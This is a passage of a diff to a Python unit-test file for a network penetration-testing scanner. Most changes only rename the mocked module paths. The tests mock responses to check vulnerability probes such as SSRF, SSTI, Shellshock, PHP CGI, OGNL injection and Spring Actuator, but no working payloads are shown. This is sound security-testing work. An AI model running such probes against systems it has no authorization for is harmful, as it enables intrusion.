saved_reports.append(data) - return "QmReport123" - plugin.r1fs.add_json.side_effect = capture_add_json - - job_specs = {"job_id": "job-1", "target": "10.0.0.1", "workers": {}} - plugin.chainstore_hget.return_value = job_specs - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - plugin._get_job_config = MagicMock(return_value={"redact_credentials": False}) - plugin._redact_report = MagicMock(side_effect=lambda r: r) - - PentesterApi01Plugin._close_job(plugin, "job-1") - - # The report saved to R1FS should have properly merged metrics - self.assertEqual(len(saved_reports), 1) - sm = saved_reports[0].get("scan_metrics") - self.assertIsNotNone(sm) - # Connection outcomes should be summed, not last-writer-wins - self.assertEqual(sm["connection_outcomes"]["connected"], 18) - self.assertEqual(sm["connection_outcomes"]["timeout"], 7) - 
self.assertEqual(sm["connection_outcomes"]["total"], 25) - # Max duration - self.assertEqual(sm["total_duration"], 45.0) - # Probes summed - self.assertEqual(sm["probes_attempted"], 4) - self.assertEqual(sm["probes_completed"], 3) - # OR flags - self.assertTrue(sm["rate_limiting_detected"]) - - def test_finalize_pass_attaches_pass_metrics(self): - """16c: _maybe_finalize_pass merges node metrics into PassReport.scan_metrics.""" - TestPhase15Listing._mock_plugin_modules() - from extensions.business.cybersec.red_mesh.pentester_api_01 import PentesterApi01Plugin - - plugin = MagicMock() - plugin.cfg_instance_id = "test-instance" - plugin.ee_addr = "node-launcher" - plugin.cfg_llm_agent_api_enabled = False - plugin.cfg_attestation_min_seconds_between_submits = 3600 - - # Two workers, each with a report_cid - workers = { - "node-A": {"finished": True, "report_cid": "cid-report-A"}, - "node-B": {"finished": True, "report_cid": "cid-report-B"}, - } - job_specs = { - "job_id": "job-1", - "job_status": "RUNNING", - "target": "10.0.0.1", - "run_mode": "SINGLEPASS", - "launcher": "node-launcher", - "workers": workers, - "job_pass": 1, - "pass_reports": [], - "timeline": [{"event": "created", "ts": 1700000000.0}], - } - plugin.chainstore_hgetall.return_value = {"job-1": job_specs} - plugin._normalize_job_record = MagicMock(return_value=("job-1", job_specs)) - plugin.time.return_value = 1700000120.0 - - # Node reports with different metrics - node_report_a = { - "open_ports": [80], "service_info": {}, "web_tests_info": {}, - "correlation_findings": [], "start_port": 1, "end_port": 32767, - "ports_scanned": 32767, - "scan_metrics": { - "connection_outcomes": {"connected": 5, "timeout": 1, "total": 6}, - "total_duration": 50.0, - "probes_attempted": 3, "probes_completed": 3, "probes_skipped": 0, "probes_failed": 0, - "rate_limiting_detected": False, "blocking_detected": False, - } - } - node_report_b = { - "open_ports": [443], "service_info": {}, "web_tests_info": {}, - 
"correlation_findings": [], "start_port": 32768, "end_port": 65535, - "ports_scanned": 32768, - "scan_metrics": { - "connection_outcomes": {"connected": 3, "timeout": 4, "total": 7}, - "total_duration": 65.0, - "probes_attempted": 3, "probes_completed": 2, "probes_skipped": 0, "probes_failed": 1, - "rate_limiting_detected": False, "blocking_detected": True, - } - } - - node_reports_by_addr = {"node-A": node_report_a, "node-B": node_report_b} - plugin._collect_node_reports = MagicMock(return_value=node_reports_by_addr) - # _get_aggregated_report would use merge_objects_deep (wrong for metrics) - # Return a dict with last-writer-wins metrics to simulate the bug - plugin._get_aggregated_report = MagicMock(return_value={ - "open_ports": [80, 443], "service_info": {}, "web_tests_info": {}, - "scan_metrics": node_report_b["scan_metrics"], # wrong — just node B's - }) - # Use real static method for merge - plugin._merge_worker_metrics = PentesterApi01Plugin._merge_worker_metrics - - # Capture what gets saved as pass report - saved_pass_reports = [] - def capture_add_json(data, show_logs=False): - saved_pass_reports.append(data) - return f"QmPassReport{len(saved_pass_reports)}" - plugin.r1fs.add_json.side_effect = capture_add_json - - plugin._compute_risk_and_findings = MagicMock(return_value=({"score": 25, "breakdown": {}}, [])) - plugin._get_job_config = MagicMock(return_value={}) - plugin._submit_redmesh_test_attestation = MagicMock(return_value=None) - plugin._build_job_archive = MagicMock() - plugin._clear_live_progress = MagicMock() - plugin._emit_timeline_event = MagicMock() - plugin._get_timeline_date = MagicMock(return_value=1700000000.0) - plugin.Pd = MagicMock() - - PentesterApi01Plugin._maybe_finalize_pass(plugin) - - # Should have saved: aggregated_data (step 6) + pass_report (step 10) - self.assertGreaterEqual(len(saved_pass_reports), 2) - pass_report = saved_pass_reports[-1] # Last one is the PassReport - - sm = pass_report.get("scan_metrics") - 
self.assertIsNotNone(sm, "PassReport should have scan_metrics") - # Connection outcomes summed across nodes - self.assertEqual(sm["connection_outcomes"]["connected"], 8) - self.assertEqual(sm["connection_outcomes"]["timeout"], 5) - self.assertEqual(sm["connection_outcomes"]["total"], 13) - # Max duration - self.assertEqual(sm["total_duration"], 65.0) - # Probes summed - self.assertEqual(sm["probes_attempted"], 6) - self.assertEqual(sm["probes_completed"], 5) - self.assertEqual(sm["probes_failed"], 1) - # OR flags - self.assertFalse(sm["rate_limiting_detected"]) - self.assertTrue(sm["blocking_detected"]) - class TestPhase17aQuickWins(unittest.TestCase): """Phase 17a: Quick Win probe enhancements.""" @@ -4830,6 +2530,7 @@ def test_es_nodes_jvm_modern_no_finding(self): self.assertFalse(any("EOL JVM" in t for t in titles)) + class TestPhase17bMediumFeatures(unittest.TestCase): """Phase 17b: Medium feature probe enhancements.""" @@ -5099,6 +2800,7 @@ def test_smb_share_wiring_admin_shares_high(self): self.assertTrue(any("admin shares" in t.lower() for t in titles), f"titles={titles}") + class TestOWASPFullCoverage(unittest.TestCase): """Tests for OWASP Top 10 full coverage probes (A04, A08, A09, A10 + re-tags).""" @@ -5136,7 +2838,7 @@ def test_metadata_endpoints_tagged_a10(self): resp.status_code = 200 resp.text = "ami-id instance-id" with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", return_value=resp, ): result = worker._web_test_metadata_endpoints("example.com", 80) @@ -5152,7 +2854,7 @@ def test_homepage_private_key_tagged_a08(self): resp.status_code = 200 resp.text = "-----BEGIN RSA PRIVATE KEY----- some key data" with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_homepage("example.com", 80) @@ 
-5168,7 +2870,7 @@ def test_homepage_api_key_still_a01(self): resp.status_code = 200 resp.text = "var API_KEY = 'abc123';" with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_homepage("example.com", 80) @@ -5194,7 +2896,7 @@ def fake_get(url, timeout=3, verify=False, headers=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", side_effect=fake_get, ): result = worker._web_test_metadata_endpoints("example.com", 80) @@ -5218,7 +2920,7 @@ def fake_get(url, timeout=4, verify=False, headers=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", side_effect=fake_get, ): result = worker._web_test_ssrf_basic("example.com", 80) @@ -5234,7 +2936,7 @@ def test_ssrf_basic_no_false_positive(self): resp.status_code = 200 resp.text = "Welcome" with patch( - "extensions.business.cybersec.red_mesh.web_api_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.api_exposure.requests.get", return_value=resp, ): result = worker._web_test_ssrf_basic("example.com", 80) @@ -5259,10 +2961,10 @@ def fake_post(url, data=None, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.post", side_effect=fake_post, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", side_effect=fake_post, ): result = worker._web_test_account_enumeration("example.com", 80) @@ -5281,10 +2983,10 @@ def fake_post(url, 
data=None, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.post", side_effect=fake_post, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", side_effect=fake_post, ): result = worker._web_test_account_enumeration("example.com", 80) @@ -5302,13 +3004,13 @@ def fake_request(url, *args, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.post", side_effect=fake_request, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", side_effect=fake_request, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin._time.sleep", + "extensions.business.cybersec.red_mesh.worker.web.hardening._time.sleep", ): result = worker._web_test_rate_limiting("example.com", 80) findings = result.get("findings", []) @@ -5340,13 +3042,13 @@ def fake_get(url, *args, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.post", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.post", side_effect=fake_post, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", side_effect=fake_get, ), patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin._time.sleep", + "extensions.business.cybersec.red_mesh.worker.web.hardening._time.sleep", ): result = worker._web_test_rate_limiting("example.com", 80) self.assertEqual(len(result.get("findings", [])), 0) @@ -5369,7 +3071,7 @@ def fake_get(url, 
timeout=3, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get, ): result = worker._web_test_idor_indicators("example.com", 80) @@ -5385,7 +3087,7 @@ def test_idor_auth_required(self): resp.status_code = 401 resp.text = "Unauthorized" with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", return_value=resp, ): result = worker._web_test_idor_indicators("example.com", 80) @@ -5400,7 +3102,7 @@ def test_sri_missing_external_script(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_subresource_integrity("example.com", 80) @@ -5416,7 +3118,7 @@ def test_sri_present(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_subresource_integrity("example.com", 80) @@ -5429,7 +3131,7 @@ def test_sri_same_origin_ignored(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_subresource_integrity("example.com", 80) @@ -5442,7 +3144,7 @@ def test_mixed_content_script(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = 
worker._web_test_mixed_content("example.com", 443) @@ -5458,7 +3160,7 @@ def test_mixed_content_https_only(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_mixed_content("example.com", 443) @@ -5477,7 +3179,7 @@ def test_js_lib_angularjs_eol(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_js_library_versions("example.com", 80) @@ -5493,7 +3195,7 @@ def test_js_lib_version_detected(self): resp.status_code = 200 resp.text = '' with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_js_library_versions("example.com", 80) @@ -5518,7 +3220,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_verbose_errors("example.com", 80) @@ -5538,7 +3240,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_verbose_errors("example.com", 80) @@ -5561,7 +3263,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=None): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + 
"extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_verbose_errors("example.com", 80) @@ -5587,7 +3289,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -5604,7 +3306,7 @@ def test_debug_endpoint_404(self): resp.text = "" resp.headers = {} with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_common("example.com", 80) @@ -5654,7 +3356,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("example.com", 80) @@ -5683,7 +3385,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("example.com", 80) @@ -5692,6 +3394,7 @@ def fake_get(url, timeout=3, verify=False, allow_redirects=False): self.assertEqual(len(plugin_findings), 0) + class TestDetectionGapFixes(unittest.TestCase): """Tests for detection gap fixes: Erlang SSH, BIND CVEs, DNS AXFR, SMTP HELP.""" @@ -5790,7 +3493,7 @@ def fake_recvfrom(size): return resp, ("1.2.3.4", 53) sock.recvfrom = fake_recvfrom return sock - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket", 
side_effect=fake_socket_factory): + with patch("extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket", side_effect=fake_socket_factory): with patch("socket.gethostbyaddr", side_effect=Exception("no reverse")): zones = worker._dns_discover_zones("1.2.3.4", 53) # vulhub.org should be in the list (discovered as authoritative or as fallback) @@ -5799,7 +3502,7 @@ def fake_recvfrom(size): def test_dns_zone_discovery_always_includes_fallbacks(self): """Zone discovery should include fallback domains even when reverse DNS works.""" _, worker = self._build_worker() - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket") as mock_sock: + with patch("extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket") as mock_sock: mock_inst = MagicMock() mock_inst.recvfrom.side_effect = Exception("timeout") mock_sock.return_value = mock_inst @@ -5831,7 +3534,7 @@ def fake_recvfrom(size): answer += struct.pack('>H', len(version_txt) + 1) + bytes([len(version_txt)]) + version_txt return header + question_section + answer, ("1.2.3.4", 53) - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket") as mock_sock: + with patch("extensions.business.cybersec.red_mesh.worker.service.infrastructure.socket.socket") as mock_sock: mock_inst = MagicMock() mock_inst.sendto = fake_sendto mock_inst.recvfrom = fake_recvfrom @@ -5880,6 +3583,7 @@ def test_smtp_help_extracts_version(self): ) + class TestBatch2GapFixes(unittest.TestCase): """Tests for batch 2 gaps: MySQL CVE-2016-6662, PG MD5 creds, CouchDB, InfluxDB.""" @@ -5953,7 +3657,7 @@ def fake_recv(size): return md5_request return auth_response - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket") as mock_sock: + with patch("extensions.business.cybersec.red_mesh.worker.service.database.socket.socket") as mock_sock: mock_inst = MagicMock() mock_inst.recv = fake_recv mock_sock.return_value = mock_inst @@ -5996,7 +3700,7 @@ 
def fake_get(url, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.database.requests.get", side_effect=fake_get, ): result = worker._service_info_couchdb("1.2.3.4", 5984) @@ -6020,7 +3724,7 @@ def fake_get(url, **kwargs): resp.text = '{"status": "ok"}' return resp - with patch("extensions.business.cybersec.red_mesh.service_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.service.database.requests.get", side_effect=fake_get): result = worker._service_info_couchdb("1.2.3.4", 80) self.assertIsNone(result) @@ -6050,7 +3754,7 @@ def fake_get(url, **kwargs): resp.text = '{"memstats": {"Alloc": 12345}}' return resp - with patch("extensions.business.cybersec.red_mesh.service_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.service.database.requests.get", side_effect=fake_get): result = worker._service_info_influxdb("1.2.3.4", 8086) findings = result.get("findings", []) @@ -6070,7 +3774,7 @@ def fake_get(url, **kwargs): resp.headers = {} return resp - with patch("extensions.business.cybersec.red_mesh.service_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.service.database.requests.get", side_effect=fake_get): result = worker._service_info_influxdb("1.2.3.4", 80) self.assertIsNone(result) @@ -6089,6 +3793,7 @@ def test_influxdb_cve_2019_20933(self): self.assertFalse(any("CVE-2019-20933" in f.title for f in check_cves("influxdb", "1.7.6"))) + class TestBatch3GapFixes(unittest.TestCase): """Tests for batch 3 gaps: CMS CVEs, SSTI, Shellshock, PHP CGI, dedup bug.""" @@ -6211,7 +3916,7 @@ def fake_get(url, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", 
side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("1.2.3.4", 4200) @@ -6249,7 +3954,7 @@ def fake_get(url, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("1.2.3.4", 4400) @@ -6293,8 +3998,8 @@ def fake_post(url, **kwargs): resp.text = '{"error":"..."}' return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.post", side_effect=fake_post): result = worker._web_test_cms_fingerprint("1.2.3.4", 6300) findings = result.get("findings", []) @@ -6323,7 +4028,7 @@ def fake_get(url, **kwargs): resp.text = 'Hello world' return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_ssti("1.2.3.4", 4700) findings = result.get("findings", []) @@ -6350,7 +4055,7 @@ def fake_get(url, **kwargs): resp.text = 'Hello world' return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_ssti("1.2.3.4", 4700) findings = result.get("findings", []) @@ -6375,7 +4080,7 @@ def fake_get(url, **kwargs): resp.text = "Not Found" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", 
side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_shellshock("1.2.3.4", 6600) findings = result.get("findings", []) @@ -6394,7 +4099,7 @@ def fake_get(url, **kwargs): resp.text = "Not Found" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_shellshock("1.2.3.4", 80) findings = result.get("findings", []) @@ -6424,8 +4129,8 @@ def fake_post(url, **kwargs): resp.text = "PHP page" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_php_cgi("1.2.3.4", 6700) findings = result.get("findings", []) @@ -6454,8 +4159,8 @@ def fake_post(url, **kwargs): resp.text = "Normal" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_php_cgi("1.2.3.4", 6700) findings = result.get("findings", []) @@ -6492,7 +4197,7 @@ def fake_get(url, **kwargs): return resp with patch( - 
"extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("1.2.3.4", 4200) @@ -6538,7 +4243,7 @@ def fake_get(url, **kwargs): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_cms_fingerprint("1.2.3.4", 4400) @@ -6562,7 +4267,7 @@ def fake_get(url, **kwargs): resp.text = '

    Order #5183 confirmed

    ' return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_ssti("1.2.3.4", 4300) findings = result.get("findings", []) @@ -6587,7 +4292,7 @@ def fake_get(url, **kwargs): resp.text = "Not Found" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_shellshock("1.2.3.4", 6600) findings = result.get("findings", []) @@ -6600,7 +4305,7 @@ def test_http_alt_no_duplicate_cves(self): """_service_info_http_alt should NOT emit CVE findings (dedup fix).""" _, worker = self._build_worker(ports=[8080]) - with patch("extensions.business.cybersec.red_mesh.service_mixin.socket.socket") as mock_sock: + with patch("extensions.business.cybersec.red_mesh.worker.service.common.socket.socket") as mock_sock: mock_inst = MagicMock() mock_inst.recv.return_value = ( b"HTTP/1.1 200 OK\r\n" @@ -6617,6 +4322,7 @@ def test_http_alt_no_duplicate_cves(self): self.assertEqual(result.get("server"), "Apache/2.4.25 (Debian)") + class TestBatch4JavaGapFixes(unittest.TestCase): """Tests for batch 4: Java application servers, Struts2, WebLogic, Spring.""" @@ -6758,7 +4464,7 @@ def fake_get(url, **kwargs): resp.text = 'WebLogic login page' return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get): result = worker._web_test_java_servers("1.2.3.4", 7102) findings = result.get("findings", []) @@ -6792,7 +4498,7 @@ def fake_get(url, **kwargs): resp.text = "Unauthorized" return resp - with 
patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get): result = worker._web_test_java_servers("1.2.3.4", 7104) findings = result.get("findings", []) @@ -6823,7 +4529,7 @@ def fake_get(url, **kwargs): resp.text = "JMX Console" return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get): result = worker._web_test_java_servers("1.2.3.4", 7106) findings = result.get("findings", []) @@ -6853,7 +4559,7 @@ def fake_get(url, **kwargs): resp.text = '

    Whitelabel Error Page

    ' return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get): result = worker._web_test_java_servers("1.2.3.4", 7108) findings = result.get("findings", []) @@ -6879,7 +4585,7 @@ def fake_get(url, **kwargs): resp.text = "Normal page" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_ognl_injection("1.2.3.4", 7100) findings = result.get("findings", []) @@ -6906,7 +4612,7 @@ def fake_get(url, **kwargs): resp.headers = {"Content-Type": "text/xml"} return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_java_deserialization("1.2.3.4", 7102) findings = result.get("findings", []) @@ -6928,7 +4634,7 @@ def fake_get(url, **kwargs): resp.text = "Internal Server Error" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get): result = worker._web_test_java_deserialization("1.2.3.4", 7106) findings = result.get("findings", []) @@ -6969,8 +4675,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), 
\ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7108) findings = result.get("findings", []) @@ -7000,8 +4706,8 @@ def fake_post(url, **kwargs): resp.text = '{"error":"SpelEvaluationException: evaluation failed"}' return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7109) findings = result.get("findings", []) @@ -7039,8 +4745,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.post", side_effect=fake_post): result = worker._web_test_java_servers("1.2.3.4", 7101) findings = result.get("findings", []) @@ -7081,8 +4787,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.post", 
side_effect=fake_post): result = worker._web_test_java_servers("1.2.3.4", 7101) findings = result.get("findings", []) @@ -7128,8 +4834,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.discovery.requests.post", side_effect=fake_post): result = worker._web_test_java_servers("1.2.3.4", 7108) findings = result.get("findings", []) @@ -7169,8 +4875,8 @@ def fake_post(url, **kwargs): resp.text = "" return resp - with patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", side_effect=fake_get), \ - patch("extensions.business.cybersec.red_mesh.web_injection_mixin.requests.post", side_effect=fake_post): + with patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", side_effect=fake_get), \ + patch("extensions.business.cybersec.red_mesh.worker.web.injection.requests.post", side_effect=fake_post): result = worker._web_test_spring_actuator("1.2.3.4", 7108) findings = result.get("findings", []) @@ -7178,6 +4884,7 @@ def fake_post(url, **kwargs): 